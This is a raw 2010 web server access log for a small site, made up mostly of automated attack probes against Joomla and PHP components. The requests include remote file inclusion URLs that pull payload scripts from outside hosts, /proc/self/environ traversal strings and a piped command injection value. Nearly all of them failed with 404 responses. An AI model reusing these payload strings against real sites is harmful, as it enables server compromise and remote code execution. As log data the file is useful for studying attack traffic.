87.229.26.132 - - [24/Jul/2010:02:03:03 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:03:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:03:59 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:06:05 -0700] "GET /logs/access_100508.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:06:05 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:06:05 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:08:25 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:08:25 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:08:25 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:08:26 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:08:26 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:08:26 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:08:26 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:08:26 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:08:26 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:08:26 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:08:26 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:08:26 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:02:08:48 -0700] "GET /logs/access_100710.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:02:08:49 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:02:08:49 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:08:54 -0700] "GET /logs/access_100417.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
122.201.82.173 - - [24/Jul/2010:02:09:16 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
122.201.82.173 - - [24/Jul/2010:02:09:16 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:02:09:27 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:02:09:27 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:02:09:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
122.201.82.173 - - [24/Jul/2010:02:10:10 -0700] "GET /logs/access_100227.log//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
122.201.82.173 - - [24/Jul/2010:02:10:10 -0700] "GET /logs/access_100417.log//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:12:43 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://esuga.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:12:43 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://esuga.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:12:44 -0700] "GET /logs/access_100424.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://esuga.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:13:43 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
200.29.171.35 - - [24/Jul/2010:02:17:06 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.29.171.35 - - [24/Jul/2010:02:17:06 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.29.171.35 - - [24/Jul/2010:02:17:09 -0700] "GET /logs/access_100227.log//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:17:19 -0700] "GET /logs/access_100424.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:17:20 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:17:20 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:02:17:20 -0700] "GET /logs/access_100710.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:02:17:21 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:02:17:21 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:17:42 -0700] "GET /logs/access_100424.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://esuga.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:02:17:58 -0700] "GET /logs/access_100227.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:02:17:58 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:02:17:58 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:02:17:58 -0700] "GET /logs/access_100227.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:02:17:58 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:02:17:58 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:02:18:47 -0700] "GET /logs/access.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:19:46 -0700] "GET /logs/access_100424.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:19:46 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:19:46 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:23:21 -0700] "GET /logs/access_100417.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://esuga.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.getyourselfahorse.com"
67.195.115.92 - - [24/Jul/2010:02:24:53 -0700] "GET /logs/access_100619.log HTTP/1.0" 200 7785848 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:25:20 -0700] "POST /logs/access_100710.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:25:20 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:25:20 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:25:27 -0700] "POST /logs/access_100710.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:25:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:25:28 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:25:33 -0700] "POST /logs/access_100710.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:25:33 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:25:33 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:25:34 -0700] "POST /logs/access_100710.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:25:34 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
67.228.55.28 - - [24/Jul/2010:02:25:35 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:26:10 -0700] "GET /logs/access_100417.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://esuga.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.getyourselfahorse.com"
67.195.111.183 - - [24/Jul/2010:02:27:03 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
67.195.111.183 - - [24/Jul/2010:02:27:03 -0700] "GET /logs/?D=A HTTP/1.0" 200 3925 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
67.195.111.183 - - [24/Jul/2010:02:28:56 -0700] "GET /logs/access_100724.log HTTP/1.0" 200 5438412 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:02:29:23 -0700] "GET /logs/access_100320.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:02:29:24 -0700] "GET /logs/access_100320.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
151.97.124.201 - - [24/Jul/2010:02:31:07 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
151.97.124.201 - - [24/Jul/2010:02:31:07 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
151.97.124.201 - - [24/Jul/2010:02:31:07 -0700] "GET /logs/access_100529.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.44.82.118 - - [24/Jul/2010:02:35:33 -0700] "GET /logs/access_100327.log//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
62.44.82.118 - - [24/Jul/2010:02:35:34 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
62.44.82.118 - - [24/Jul/2010:02:35:34 -0700] "GET /logs//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
91.121.26.63 - - [24/Jul/2010:02:37:20 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
64.207.204.37 - - [24/Jul/2010:02:39:58 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
64.207.204.37 - - [24/Jul/2010:02:39:58 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
89.108.64.232 - - [24/Jul/2010:02:40:29 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:02:40:38 -0700] "GET /logs/access_100417.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
89.108.64.232 - - [24/Jul/2010:02:40:56 -0700] "GET /logs/access_100626.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
89.108.64.232 - - [24/Jul/2010:02:40:56 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
89.108.64.232 - - [24/Jul/2010:02:40:56 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
89.238.172.42 - - [24/Jul/2010:02:41:12 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.getyourselfahorse.com"
89.108.64.232 - - [24/Jul/2010:02:41:26 -0700] "GET /logs/access_100320.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
89.108.64.232 - - [24/Jul/2010:02:41:26 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
89.108.64.232 - - [24/Jul/2010:02:41:26 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
91.121.26.63 - - [24/Jul/2010:02:41:38 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
89.108.64.232 - - [24/Jul/2010:02:41:39 -0700] "GET /logs/access_100327.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
208.100.55.39 - - [24/Jul/2010:02:42:00 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
114.108.151.149 - - [24/Jul/2010:02:43:00 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
71.12.223.67 - - [24/Jul/2010:02:43:28 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.getyourselfahorse.com"
114.108.151.149 - - [24/Jul/2010:02:43:33 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
91.121.26.63 - - [24/Jul/2010:02:43:46 -0700] "GET /logs/access.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
91.121.26.63 - - [24/Jul/2010:02:43:46 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
91.121.26.63 - - [24/Jul/2010:02:43:47 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
91.121.26.63 - - [24/Jul/2010:02:44:02 -0700] "GET /logs/access_100626.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
62.44.82.118 - - [24/Jul/2010:02:44:15 -0700] "GET /logs/access_100515.log//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
62.44.82.118 - - [24/Jul/2010:02:44:15 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
62.44.82.118 - - [24/Jul/2010:02:44:15 -0700] "GET /logs//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
64.207.204.37 - - [24/Jul/2010:02:44:34 -0700] "GET /logs/access_100710.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
64.207.204.37 - - [24/Jul/2010:02:44:34 -0700] "GET /logs/access_100710.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
64.207.204.37 - - [24/Jul/2010:02:44:34 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
64.207.204.37 - - [24/Jul/2010:02:44:34 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
64.207.204.37 - - [24/Jul/2010:02:44:35 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
64.207.204.37 - - [24/Jul/2010:02:44:35 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:02:45:18 -0700] "GET /logs/access_100417.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:02:45:18 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:02:45:18 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.236.43.200 - - [24/Jul/2010:02:45:27 -0700] "GET /logs/access_100417.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.yeshouse.net/my/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
211.236.43.200 - - [24/Jul/2010:02:45:27 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.yeshouse.net/my/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
211.236.43.200 - - [24/Jul/2010:02:45:28 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.yeshouse.net/my/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
89.108.64.232 - - [24/Jul/2010:02:46:03 -0700] "GET /logs/access_100327.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
